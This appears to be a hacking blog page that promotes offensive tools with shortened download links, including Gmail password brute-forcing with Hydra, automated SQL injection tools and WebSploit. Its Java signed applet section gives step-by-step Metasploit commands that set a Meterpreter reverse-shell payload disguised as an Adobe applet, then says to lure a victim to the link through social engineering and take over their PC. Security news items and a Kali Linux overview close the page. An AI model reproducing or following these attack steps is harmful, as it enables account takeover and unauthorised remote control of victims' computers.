BRUTEFORCE GMAIL PASSWORD WITH BACKTRACK 5 R3

BruteForce is the easiest way to hack an Gmail account password. That’s why you can find many queries on web asking for a working BruteForce.In this tutorial I will show you how to BruteForce gmail password with THC Hydra on BackTrack 5 R3.

TUTORIAL: http://adf.ly/Nohpt

MAKE YOUR WORDLIST

TUTORIAL: http://adf.ly/Nojfm

SQL POIZON - SQLI EXPLOIT SCANNER TOOL

Sql Poizon tool includes php , asp , rfi , lfi dorks and using this tools you can find vulnerable sites like sql vulnerable sites and you can also find vulnerable sites by country and you can hack sql vulnerable sites using Sql Poizon tool and you can also browse the sites using this tool.

DOWNLOAD: SQL Poizon here

NMAP (NETWORK MAPPER)

Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich) [1] used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses. Unlike many simple port scanners that just send packets at so me predefined constant rate, Nmap accounts for the network conditions (latency fluctuations, network congestion, the target interference with the scan) during the run. Also, owing to the large and active user community providing feedback and contributing to its features, Nmap has been able to extend its discovery capabilities beyond simply figuring out whether a host is up or down and which ports are open and closed; it can determine the operating system of the target, names and versions of the listening services, estimated uptime, type of device, and presence of a firewall.

TUTORIAL FOR THIS: http://www.youtube.com/watch?v=0YlEt4hAccQ

W3AF WEB SCANNER

w3af is an open-source web application security scanner. The project provides a vulnerability scanner and exploitation tool for Web applications.It provides information about security vulnerabilities and aids in penetration testing efforts.

This cross-platform tool is available in all of the popular operating systems such as Microsoft Windows, Linux,Mac OS X, FreeBSD and OpenBSD and is written in the Python programming language. Users have the choice between a graphic user interface and a command-line interface.

w3af identifies most web application vulnerabilities using more than 130 plug-ins. After identification, vulnerabilities like (blind) SQL injections, OS commanding, remote file inclusions (PHP), cross-site scripting(XSS), and unsafe file uploads, can be exploited in order to gain different types of access to the remote system.

TUTORIAL FOR THIS: http://www.youtube.com/watch?v=dapqNO7K_xI

WEBSPLOIT

WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability

[+]Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector - inject reverse & bind payload into file format
[+]phpmyadmin - Search Target phpmyadmin login page
[+]lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF
[+]apache users - search server username directory (if use from apache webserver)
[+]Dir Bruter - brute target directory with wordlist
[+]admin finder - search admin & login page of target
[+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+]MITM - Man In The Middle Attack
[+]Java Applet Attack - Java Signed Applet Attack
[+]MFOD Attack Vector - Middle Finger Of Doom Attack Vector
[+]USB Infection Attack - Create Executable Backdoor For Infect USB For Windows

DOWNLOAD LINK: http://adf.ly/Ni5sA

PROXYSTRIKE

One tool that i find useful in detecting sql injection flaws is proxystrike. Proxystrike is a proxy/scanner that looks for sql and xss vulnerabilities. From the proxystrike documentation

TUTORIAL FOR THIS: http://www.youtube.com/watch?v=2fdfE6uELkg

TOR PROXY

Vidalia is a cross-platform graphical controller for the Tor software, built using the Qt framework. Vidalia runs on most platforms supported by Qt 4.3 or later, including Microsoft Windows, Apple OS X, and Linux or other Unix variants using the X11 window system. It was originally written by Matt Edman, and is currently maintained by Tomás Touceda.

Vidalia lets you start and stop Tor, see how much bandwidth you are consuming, see how many circuits you currently have active, see where these circuits are connected on a global map, view messages from Tor about its progress and current state, and let you configure your Tor client, bridge, or relay with a simple interface. Included in Vidalia is an extensive help system which helps you understand all of the options available to you. All of these features are translated into a large number of languages. 

TUTORIAL FOR THIS:http://www.youtube.com/watch?v=HtqfFeSvWEQ

DOWNLOAD: http://adf.ly/FzLoL

JAVA SIGNED APPLET EXPLOIT

This exploit dynamically creates a .jar file via the Msf:: Exploit::Java mixin, then signs the it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim’s JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the “Publisher” line. Newer JVMs display “UNKNOWN” when the signature is not trusted (i.e., it’s not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks “run”, the applet executes with full user permissions.

Open backtrack terminal type msfconsole

Now type use exploit/multi/browser/java_signed_applet press enter

Msf exploit (Java_signed-applet)>Set payload windows/meterpreter/reverse_tcp

Msf exploit (Java_signed-applet)>Set appletname adobe (The main applet’s class name)

Msf exploit (Java_signed-applet)>Set certcn adobe player (value for the certificate)

Msf exploit (Java_signed-applet)>Set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (Java_signed-applet)>Set srvport 80 (The local port to listen on default: 8080)

Msf exploit (Java_signed-applet)>Set uripath adobevideos (The Url to use for this exploit)

Msf exploit (Java_signed-applet)>Set lport 443

Msf exploit (Java_signed-applet)>exploit 

Now an URL you should give to your victim http://192.168.1.4/adobevideos

Send the link of the server to the victim via chat or email or any social engineering technique.
When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

You now have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

VIDEO TUTORIAL: http://adf.ly/OUZOp

HACKING WEP KEY WITH AIRCRACK-NG

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP andWPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. The program runs under Linux and Windows.

DOWNLOAD Aircrack-ng: http://adf.ly/P96Gx

Wired Equivalent Privacy (WEP) is a securityalgorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in September 1999, its intention was to provide data confidentiality comparable to that of a traditional wired network.WEP, recognizable by the key of 10 or 26 hexadecimal digits, is widely in use and is often the first security choice presented to users by router configuration tools.

Although its name implies that it is as secure as a wired connection, WEP has been demonstrated to have numerous flaws and has been deprecated in favor of newer standards such as WPA2. In 2003 the Wi-Fi Alliance announced that WEP had been superseded by Wi-Fi Protected Access (WPA). In 2004, with the ratification of the full 802.11i standard (i.e. WPA2), the IEEE declared that both WEP-40 and WEP-104 "have been deprecated as they fail to meet their security goals"

VIDEO TUTORIAL:  http://adf.ly/P93y8 

 TEXT TUTORIAL:     http://adf.ly/P95DQ

DARK JUMPER

Darkjumper is a free tool what will try to find every website that hosts at the same server as your target. Then check for every vulnerability of each website that host at the same server.

· scan sql injection, rfi, lfi, blind sql injection

· autosql injector
· proxy support
· verbocity
· autoftp bruteforcer
· IP or Proxy checker and GeoIP

DOWNLOAD LINK: http://adf.ly/O9IYL

BACKTRACK BASIC COMMANDS YOU MUST KNOW

File Operations

pwd              Print Name Of Current/Working Directory
cd                 Changing The Working Directory
cp                 Copy Files Or Directory
rm                 Remove Files And Directory
ls                   List Of Directory Contents
mkdir             Make Directory
cat                 Concatenate Files And Print On Standard Output
mv                 Move Files
chmod           Change Files Permissions

                                       Know Your System

                                                     

uname            Print System Information
who               Show Who Is Logged On
cal                 Displays Calculator
date               Print System Date And Time
df                   Report File System Disk Space Usage
du                  Estimate File Space Usage
ps                  Displays Information Of Current Active Processes
kill                 Allows To Kills Process
clear              Clear The Terminal Screen
cat /proc/cpuinfo      Cpuinfo Display CPU Information
cat /proc/meminfo    Display Memory Information

                                                               Compression

tar                To Store And Extract Files From An Archive File Known As Tar File

gzip              Compress Or Decompress Named Files

                Network

ifconfig          To Config Network Interface
ping               Check The Other System Are Reachable From The Host System
wget              Download Files From Network
ssh                Remote Login Program
ftp                 Download/Upload Files From/To Remote System
last                Displays List Of Last Logged In User
telnet             Used To Communicate With Another Host Using THe Telnet Protocol


                                         Searching Files

grep              Search Files(s) For Specific Text

find               Search For Files In A Directory Hierarchy
locate            Find Files By Name

TUTORIAL FOR MORE COMMANDS: http://adf.ly/P0xkG

Netool.sh V2.4 Released

New modules:

• webcrawler.py
• Agressive Directory Scanner
• Fast Directory Scanner
• Admin Page Finder
• WebShell.php Scanner
• File Upload Scanner

[nmap]
Scan List.txt of targets

Description of the script:
netool.sh is a script in bash to automate frameworks like Nmap,Driftnet,SSLstrip, and ettercap MITM attacks, Retrieves metadata, geo-location of target, changes hostname, change IP and Mac-Address to decoy scans, search for admin login page on taget website, search for directorys inside target website, search for webshells.php planted on website and scan Common URL File Upload vulns, also capture pictures of web-browser surfing of the target machine, perform TCP/UDP packets manipulation using etter.filters, DoS attacks local/external network,also uses metasploit [msfpayload+msfencode+msfcli] to gain control of target machine ...

Home project:  http://adf.ly/OPMs5

See WIKI : http://adf.ly/OPMmr

DOWNLOAD LINK: http://adf.ly/OPMaR

Enjoy, and save hacking ...

BIGGEST PASSWORD CRACKING WORDLIST WITH MILLIONS OF WORDS

One of the biggest and very comprehensive collection of 1,493,677,782 word for Password cracking list released for download. The wordlists are intended primarily for use with password crackers such as hashcat, John the Ripper and with password recovery utilities.

Defuse Security have released the wordlist of 4.2 GiB (compressed) or 15 GiB (uncompressed) used by their Crackstation project.

DOWNLOAD

SQL INJECTION

SQL injection is a technique often used to attack databases through a website. This is done by including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g. dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in a website's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

TUTORIAL FOR THIS: http://www.youtube.com/watch?v=g-BA6S9ToEo

THE MOLE AUTOMATED SQL INJECTION TOOL

Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique. The Mole uses a command based interface, allowing the user to indicate the action he wants to perform easily. The CLI also provides auto-completion on both commands and command arguments, making the user type as less as possible.

DOWNLOAD Mole for Linux

DOWNLOAD Mole for Windows

SAFE3SI

Safe3SI is one of the most powerful and easy usage penetration tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

DOWNLOAD LINK: http://adf.ly/Nk6UZ

BSQL HACKER _by SHINE SREEDHAR

BSQL (Blind SQL) Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database.

DOWNLOAD LINK: http://adf.ly/NlRBz

PANGOLIN - SQL INJECTION TOOL-post by_ shine sreedhar

Pangolin is an automatic SQL injection penetration testing tool developed by NOSEC. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Database Support:

* Access: Informations (Database Path; Root Path; Drivers); Data
* MSSql: Informations; Data; FileReader; RegReader; FileWriter; Cmd; DirTree
* MySql: Informations; Data; FileReader; FileWriter;
* Oracle: Inforatmions (Version; IP; Database; Accounts); Data;
* Informix: Informatons; Data
* DB2: Informatons; Data; and more;
* Sybase: Informatons; Data; and more;
* PostgreSQL: Informatons; Data; FileReader;
* Sqlite: Informatons; Data

DOWNLOAD: http://adf.ly/NpOLZ

GFI LanGuard 2012 One Solution For Vulnerability Scanning, Patch Management, Network & Software Auditing

Earlier GFI LanGuard, while looking at the rising cyber threats, security researcher  continue to identify new, sophisticated malware threats, vulnerability and patchmanagement are more critical than ever as a key component of a layered security approach. To get rid of all those security challenges, GFI Software announced the availability of GFI LanGuard 2012, in which the manufacturer claimed to provide network and system administrators with the ability to manage 100 percent of their patching needs through a single, intuitive and easy-to-use interface, without the need for other update tools. So lets take a roam of this fine product of GFI Software-

Enhanced Features of GFI LanGuard 2012 include:

·         Comprehensive Patch Management – Administrators can now manage 100 percent of their patching needs – both security and non-security updates – from a centralized console. No other update tools are necessary.

·         Strong Vulnerability Assessment for Network Devices – Network devices such as printers, routers and switches from manufacturers such as HP and Cisco, can now be detected and scanned for vulnerabilities. GFI LanGuard 2012 performs over 50,000 checks against operating systems, installed applications and device firmware for security flaws and misconfigurations. It also runs network audits that now detect mobile devices running iOS and Android operating systems.

·         Improved Scan and Remediation Performance – New Relay Agents receive patches and definition files directly from the GFI LanGuard server and distribute as appropriate – helping IT resources save time, manage network bandwidth and increase the number of devices that can be accommodated. This is particularly effective in multi-site and large networks.

GFI LanGuard 2012 combines vulnerability scanning, patch management, and network and software auditing into one solution that enables IT professionals to scan, detect, assess and correct potential security risks on their networks with minimal administrative effort. GFI LanGuard also enables administrators to inventory devices attached to their networks; receive change alerts, such as notification when a new application is installed; ensure antivirus applications are current and enabled; and strengthen compliance with industry regulations through automated patch management that defends against potential network vulnerabilities. With GFI LanGuard, IT administrators can manage more than 2,500 machines from a single console, it integrates with more than 1,500 security applications and includes keyword search functionality.

After going through the above brief description, many of you must be excited about this new product. For the kind information of our readers, yes indeed GFI LanGuard 2012 is one of the finest tool ever released in this domain. Detailed information LanGuard 2012 can be found here. Also a 30 day trail pack of GFI LanGuard 2012 has been made available for download.

WordPress.com boosts security with Two Step authentication

WordPress.com , a blog web hosting service provided, announced that they have enabled Two-step authentication feature to keep your blogger account secure.

Two factor authentication is a security feature that prompts you to enter a temporary secret number sent to your phone whenever you log into your account. 

How to enable Two step authentication in Wordpress?

To enable this feature, go to the new Security tab in your WordPress.com account settings, and go through the setup wizard.

"We know your blog is important to you, and today we’re proud to announce Two Step Authentication: an optional new feature to help you keep your WordPress.com account secure." Wordpress.com blog post reads.

Chrome and Firefox Browser Extensions hijack facebook accounts

Security researchers from Microsoft warn users of new piece of Trojan in the form of Mozilla add on and chrome extension that can hijack your facebook profile.

The threat was first discovered in Brazil , Microsoft detect it as "Trojan:JS/Febipos.A."

The Trojan monitors checks if the user is logged in to facebook.   Then, it attempts to download a configuration file that includes a list of commands.

According to the Malware Protection center report, the malware is capable of doing the following with your facebook account: Like a page, share, post, Join a group,Invite friends to a group, Chat to friends, Comment on a post.

" There may be more to this threat because it can change its messages, URLs, Facebook pages and other activity at any time."Microsoft concluded. "In any case, we recommend you always keep your security products updated with the latest definitions to help avoid infection. "

Mozilla Firefox 21 closes three critical security holes

Mozilla has released Firefox 21 that closes eight security vulnerabilities including four High level and three critical security flaws.

Critical vulnerabilities : Memory corruption found using Address Sanitizer(MFSA 2013-48 ),  Use-after-free with video and onresize event(MFSA 2013-46), Miscellaneous memory safety hazards ( MFSA 2013-41).

High level vulnerabilities:  Uninitialized functions in DOMSVGZoomEvent( MFSA 2013-47),  Mozilla Updater fails to update some Windows Registry entries( MFSA 2013-45), Local privilege escalation through Mozilla Maintenance Service ( MFSA 2013-44 ),  Privileged access for content level constructor(MFSA 2013-42).

Firefox 21 introduces new feature Social API that "makes it easy for your favorite social providers to add a sidebar with your content to Firefox or notification buttons directly on the Firefox toolbar."

It also introduces Health report that "logs basic health information about your browser and then give you tools to understand that information and fix any problems you encounter". 

Users are advised to upgrade the firefox as soon as possible, you can check version and update your browser by selecting to Help->About firefox.

Dorkbot malware spy on Facebook users' browser activities

Security researchers from Bitdefender Labs have spotted a new variant of the Dorkbot malware that targets Facebook users , spreading through the social network's internal chat

Dorkbot is a IRC based worm that spreads via instant message programs, social networks that can steal login credentials and blocks security updates. 

The malware has been uploaded with '.JPG' extension in file sharing website mediafire. Once the malware compromised the victim's system, it sent links to the malware to the victim's friends via chat service, according to Computer world report. 

Researchers said the malware is capable of spying on users’ browsing activities and stealing their personal details.Bitdefender discovered links to the malware circulating in the United States, India, Portugal, the UK, Germany, Turkey and Romania

'Kali Linux' The Most Advanced & Stable Penetration Testing Distribution

Fans of world famous penetration testing distribution 'BackTrack' can now taste another flavor as the developer at BackTrack and Offensive Security has introduced a new Linux distribution targets enterprise security, offering a suite of helpful tools for rigorous testing calling it "Kali Linux." In the official release note Offensive-Security claimed that Kali Linux is the most advanced, robust, and stable penetration testing distribution to date. From that note we also came to know that this new distribution is a product of seven years long knowledge and experience which make Kali Linux the “next generation” penetration testing distribution. Now lets look at the main features of Kali Linux at a glance: 

Kali Linux Features:-

Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our VCS.

• More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we eliminated a great number of tools that either did not work or had other tools available that provided similar functionality.
• Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will never, ever have to pay for Kali Linux.
• Open source Git tree: We are huge proponents of open source software and ourdevelopment tree is available for all to see and all sources are available for those who wish to tweak and rebuild packages.
• FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all Linux users to easily locate binaries, support files, libraries, etc.
• Vast wireless device support: We have built Kali Linux to support as many wireless devices as we possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with numerous USB and other wireless devices.
• Custom kernel patched for injection: As penetration testers, the development team often needs to do wireless assessments so our kernel has the latest injection patches included.
• Secure development environment: The Kali Linux team is made up of a small group of trusted individuals who can only commit packages and interact with the repositories while using multiple secure protocols.
• GPG signed packages and repos: All Kali packages are signed by each individual developer when they are built and committed and the repositories subsequently sign the packages as well.
• Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job.
• Completely customizable: We completely understand that not everyone will agree with our design decisions so we have made it as easy as possible for our more adventurous users tocustomize Kali Linux to their liking, all the way down to the kernel.
• ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and inexpensive, we knew that Kali’s ARM support would need to be as robust as we could manage, resulting in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories integrated with the mainline distribution so tools for ARM will be updated in conjunction with the rest of the distribution. Kali is currently available for the following ARM devices:
• rk3306 mk/ss808
• Raspberry Pi
• ODROID U2/X2
• Samsung Chromebook

Kali is specifically tailored to penetration testing and therefore, all documentation on this site assumes prior knowledge of the Linux operating system. For more information, I would like to request you to visit the official website of Kali Linux. 

To Download Kali Linux (.iso, VMWare Image, Samsung Chromebook ARM, Odroid U2, Raspberry Pi & rk3306 mk/ss808) Click Here